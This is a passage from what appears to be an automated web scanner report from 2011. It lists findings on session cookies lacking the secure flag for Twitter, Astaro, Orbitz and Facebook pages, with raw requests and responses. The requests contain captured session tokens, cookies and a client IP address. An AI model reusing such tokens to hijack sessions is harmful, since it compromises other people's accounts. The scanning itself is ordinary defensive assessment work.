_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sessions/destroy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 404 Not Found
Date: Wed, 02 Feb 2011 16:24:11 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296663851-66867-49140
Last-Modified: Wed, 02 Feb 2011 16:24:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

7.17. https://twitter.com/signup previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.18. https://twitter.com/tos previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/tos

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.19. https://www.astaro.co.uk/beacon/(beid previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.astaro.co.uk
Path:	/beacon/(beid

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

eZSESSIDeu=bv7eodcrp0t34v0n39i8932ve0; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.20. https://www.astaro.com/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.astaro.com
Path:	/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

eZSESSIDen=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDch=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDau=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1 HTTP/1.1
Host: www.astaro.com
Connection: keep-alive
Referer: https://www.astaro.com/user/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; session_start_time=1296568531414; k_visit=2; push_time_start=1296569531420; has_js=1; __unam=fa38af9-12dddaf19a7-13ff2714-3; __utma=112476180.1215039085.1296493738.1296504424.1296568533.3; __utmc=112476180; __utmb=112476180.3.10.1296568533; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.4.10.1296568533; eZSESSIDen=3arq6oafh8mmgccr289cup83h1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:55:56 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:55:56 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Set-Cookie: eZSESSIDen=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
Set-Cookie: eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
Set-Cookie: eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
Set-Cookie: eZSESSIDch=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
Set-Cookie: eZSESSIDau=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
Set-Cookie: eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

7.21. https://www.astaro.com/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.astaro.com
Path:	/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

eZSESSIDen=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDch=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDau=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1 HTTP/1.1
Host: www.astaro.com
Connection: keep-alive
Referer: https://www.astaro.com/tool/signup
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; session_start_time=1296568531414; k_visit=2; push_time_start=1296569531420; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; has_js=1; __unam=fa38af9-12dddaf19a7-13ff2714-5; __utma=112476180.1215039085.1296493738.1296504424.1296568533.3; __utmc=112476180; __utmb=112476180.7.10.1296568533; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.8.10.1296568533; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:57:00 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:57:00 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Set-Cookie: eZSESSIDen=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
Set-Cookie: eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
Set-Cookie: eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
Set-Cookie: eZSESSIDch=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
Set-Cookie: eZSESSIDau=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
Set-Cookie: eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

7.22. https://www.astaro.com/user/login previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.astaro.com
Path:	/user/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

eZSESSIDen=3arq6oafh8mmgccr289cup83h1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/login HTTP/1.1
Host: www.astaro.com
Connection: keep-alive
Referer: http://www.astaro.com/newsletter
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; session_start_time=1296568531414; k_visit=2; push_time_start=1296569531420; has_js=1; __unam=fa38af9-12dddaf19a7-13ff2714-3; __utma=112476180.1215039085.1296493738.1296504424.1296568533.3; __utmc=112476180; __utmb=112476180.3.10.1296568533; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.4.10.1296568533

Response

7.23. https://www.astaro.de/beacon/(beid previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.astaro.de
Path:	/beacon/(beid

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

eZSESSIDde=osr305vfiegtr4m0rumdbdt3r7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.24. https://www.astaro.net/beacon/(beid previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.astaro.net
Path:	/beacon/(beid

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

eZSESSIDen=bsb7dte2ge5s4c59fbs7127q65; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.25. https://www.orbitz.com/account/login previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.orbitz.com
Path:	/account/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=026995801E92D176318AD90FEB65F6DB; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:31 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/login?destinationUrl= HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

7.26. https://www.orbitz.com/account/registration previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.orbitz.com
Path:	/account/registration

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=A7D6B6C6B73BC640D7493A94555D7334; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:35 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/registration HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

7.27. https://www.orbitz.com/trips/writeReview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.orbitz.com
Path:	/trips/writeReview

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=B15415278A3C667686225B11283FD050; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:39 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trips/writeReview?hotelId=24684 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

7.28. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://content.atomz.com
Path:	/static/scode/H.15.1/snpall/s_code.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

v1stsp=E67B5206FBADB2C7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /static/scode/H.15.1/snpall/s_code.js HTTP/1.1
Host: content.atomz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.29. https://login.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: login.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=deleted; datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=deleted; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=deleted; __utmc=deleted; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmb=deleted;

Response

7.30. https://login.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
